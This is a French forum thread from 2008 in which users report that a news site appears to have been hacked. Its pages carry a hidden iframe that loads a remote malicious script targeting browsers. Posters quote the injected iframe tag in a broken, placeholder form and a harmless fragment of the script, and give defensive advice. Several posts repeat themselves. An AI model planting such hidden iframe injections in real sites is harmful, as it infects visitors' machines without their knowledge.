Je pense qu'Actu' a été hacké/piraté, à chaque fois que vous consulté une page, il y'a une page qui s'ouvre en douce qui se trouve en ex-Urss redirigée vers une page japonaise.
Cette dernière page contient un script malicieux qui vise sans doute les versions d'Internet explorer non patchées (je ne sais pas s'il existe un patch d'ailleurs pour cette faille)
Il semble que sous firefox il n'y ait pas de problème, même sous Windows.
Et bien sûr ceux qui n'utilisent pas Windows n'expérimentent pas ce problème.
Pour les utilisateurs de Windows:
Vous êtes invités à mettre à jour votre internet explorer (je ne sais pas si cela sera efficace) ou mieux à utiliser Firefox.
Dans tous les cas, un coup d'antivirus est nécessaire.
Ce message a été posté le 6 Mars à 15h26
ALERTE: TRES IMPORTANT
-
tristesir
-
Pili
...c'est tout à fait cela Trsite Sir, et mon ordinateur a été infécté depuis quelques jours...les pages qui s'ouvrent , sont des sites de "cul", de jeux de sport, ...et des sites pour antivirus, bref très très interessants... 
Mais l'anti virus que j'ai, securitor (wanadoo) ne semble pas assez fort pour reparer le truc.
Donc je prends note de toutes tes infos, merci beaucoup, Triste Sir pour les tuyaux
rajout, j'y connais rien, mais cela ne concerne pas que ma connection au site d'actu, cela conncerne toutes mes connexions, par exemple hier impossible via orange d'ouvrir ma messagerie, le seul moyen que j'ai trouvé a été de passer par outlook,
Mais l'anti virus que j'ai, securitor (wanadoo) ne semble pas assez fort pour reparer le truc.
Donc je prends note de toutes tes infos, merci beaucoup, Triste Sir pour les tuyaux
rajout, j'y connais rien, mais cela ne concerne pas que ma connection au site d'actu, cela conncerne toutes mes connexions, par exemple hier impossible via orange d'ouvrir ma messagerie, le seul moyen que j'ai trouvé a été de passer par outlook,
Dernière modification par Pili le 06 mars 2008, modifié 1 fois.
-
Monolecte
J'ai trouvé la ligne de hack dans le code source.
juste avant le pied de page
Cela n'effecte probablement que les Internet Explorer et leur colle un troyen à l'insue de leur plein gré.
Je cherche à vous hacker pour fixer, en attendant que votre agence bétonne la sécurité!
juste avant le pied de page
Code : Tout sélectionner
<ifra me src="http : //www.nom de domanaine.net/1/js_go_f1.php" sty le="display:none"></ifra me>Je cherche à vous hacker pour fixer, en attendant que votre agence bétonne la sécurité!
-
tristesir
il faudrait localiser dans le code php, l'endroit où est injecté cette balise iframe, en espérant que ceux qui ont hacké actu' ont rajouté un code simple ce qui n'est pas sûr quand je vois comment ils se sont emm... pour dissimuler d'où est téléchargé le programme malveillant.
Le problème demeure quant à la façon dont ils ont réussi à avoir accès au code source des pages d'actu'. Une faille non corrigée quelque part.
Le problème demeure quant à la façon dont ils ont réussi à avoir accès au code source des pages d'actu'. Une faille non corrigée quelque part.
-
Monolecte
Le code est tout simple, il doit avoir été glissé dans la page /dist/inc_pied.html ou un truc approchant.
Pour rentrer, il suffit de trouver un dossier non protégé... à une époque, les dossiers images/ étaient de vraies passoires.
C'est au prestataire de fixer le hack avant que l'hébergeur choppe un coup de grisou...
Pour rentrer, il suffit de trouver un dossier non protégé... à une époque, les dossiers images/ étaient de vraies passoires.
C'est au prestataire de fixer le hack avant que l'hébergeur choppe un coup de grisou...
-
tristesir
-
tristesir
Ca reste à confirmer et ce n'est peut être que provisoire ceux qui ont hacké Actu' peuvent sans doute encore le faire.
-
diety
L'infection est toujours là.
J'ai jeté un coup d'oeil sur le fichier js_go_f1.php. C'est du javascript, destiné à IE et Mozilla:
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
Je ne vais pas poster tout le code ici; je conseille de désactiver javascript (simple chez firefox) en attendant l'éffacement du code malicieux.
J'ai jeté un coup d'oeil sur le fichier js_go_f1.php. C'est du javascript, destiné à IE et Mozilla:
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
Je ne vais pas poster tout le code ici; je conseille de désactiver javascript (simple chez firefox) en attendant l'éffacement du code malicieux.
-
jc26
-
zalou
J'ai alerté nos amis
J'ai alerté nos amis (hébergeurs et concepteurs).
Mais pour le moment, je ne peux rien faire de plus.
Yves - Un animateur
Mais pour le moment, je ne peux rien faire de plus.
Yves - Un animateur
-
tristesir
Bon grace à ce petit incident j'ai un peu révisé le javascript.
Il s'agit bien d'un virus, un troyan très probablement.
Ce fichier (une version de ce fichier, lire la suite) n'est pas détecté par mon antivirus et le fichier injecté dans une machine vulnérable peut ne pas être semblable à chaque fois ce qui peut rendre sa détection plus difficile.
Apparemment, le script malicieux est prévu pour internet explorer et firefox.
Mais je suppose que la mise à jour récente de firefox a éliminé le problème parce qu'il ne me semble pas que j'ai été infecté.
Il s'agit bien d'un virus, un troyan très probablement.
Ce fichier (une version de ce fichier, lire la suite) n'est pas détecté par mon antivirus et le fichier injecté dans une machine vulnérable peut ne pas être semblable à chaque fois ce qui peut rendre sa détection plus difficile.
Apparemment, le script malicieux est prévu pour internet explorer et firefox.
Mais je suppose que la mise à jour récente de firefox a éliminé le problème parce qu'il ne me semble pas que j'ai été infecté.